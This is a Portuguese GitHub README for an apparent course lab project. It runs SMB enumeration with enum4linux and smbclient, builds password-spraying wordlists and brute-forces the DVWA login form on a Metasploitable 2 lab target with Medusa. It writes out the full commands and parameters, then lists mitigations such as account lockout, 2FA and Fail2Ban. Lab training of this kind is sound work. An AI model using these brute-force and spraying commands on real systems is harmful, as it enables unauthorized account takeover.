Skip to content

HelioASjunior/pentest-simulation-kali

Repository files navigation

Simulação de Ataque Brute Force e Enumeração | Medusa & Kali Linux Este projeto demonstra a execução de técnicas de Brute Force (Força Bruta) e Enumeração de Serviços em um ambiente controlado (Lab), utilizando ferramentas nativas do Kali Linux para identificar vulnerabilidades de autenticação.

⚙️ Tecnologias e Ferramentas SO: Kali Linux

Alvo: Metasploitable 2 (IP: 192.168.56.101)

Aplicação Web: DVWA (Damn Vulnerable Web Application)

Ferramentas: * Medusa: Brute force modular e paralelo.

Enum4linux: Enumeração de informações em sistemas Windows e Samba.

Smbclient: Cliente para acessar recursos compartilhados SMB/CIFS.

🚀 Etapas do Projeto

  1. Enumeração de Serviços (SMB) Antes do ataque de força bruta, foi realizada uma enumeração no serviço Samba para identificar usuários e compartilhamentos disponíveis.

Bash

Executando enumeração completa e salvando em log

enum4linux -a 192.168.56.101 | tee enum4_output.txt

Verificando as permissões de acesso ao diretório compartilhado

smbclient -L //192.168.56.101 -U msfadmin 2. Preparação de Wordlists Para o ataque de Password Spraying, foram criadas listas personalizadas baseadas nos dados coletados:

Bash

Criando lista de usuários

echo -e "user\nmsfadmin\nservice" > smb_users.txt

Criando lista de senhas potenciais

echo -e "password\n123456\nWelcome123\nmsfadmin" > senhas_spray.txt 3. Ataque de Brute Force Web (HTTP-FORM) Utilização do Medusa para testar combinações de credenciais na página de login do DVWA. O comando foi configurado para identificar a falha através da string de erro retornada pela página.

Bash medusa -h 192.168.56.101 -U users.txt -P pass.txt -M http
-m PAGE:'/dvwa/login.php'
-m FORM:'username=^USER^&password=^PASS^&Login=Login'
-m 'FAIL=Login failed' -t 6 Parâmetros utilizados:

-h: IP do alvo.

-U / -P: Caminhos para as wordlists de usuários e senhas.

-M http: Módulo de protocolo utilizado.

-m FORM: Define os campos de input do formulário e a mensagem de erro (FAIL).

-t 6: Define o número de threads (testes simultâneos).

🛡️ Medidas de Mitigação Como resultado deste estudo, as seguintes boas práticas são recomendadas para evitar este tipo de ataque:

Políticas de Bloqueio: Implementar bloqueio temporário de conta após X tentativas falhas.

2FA (Segundo Fator de Autenticação): Essencial para impedir acessos mesmo com a senha correta.

Monitoramento de Logs: Utilizar ferramentas como Fail2Ban para detectar e banir IPs que realizam múltiplas requisições de login.

Complexidade de Senha: Exigir senhas que não constem em wordlists comuns.

⚠️ Aviso Legal Este projeto possui fins estritamente educacionais. O uso destas técnicas em máquinas ou redes sem autorização expressa é ilegal e antiético.

Desenvolvido por: Hélio Júnior / Curso Cibersegurança(Dio)

Captura de tela 2026-03-07 193603 Captura de tela 2026-03-07 193635

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors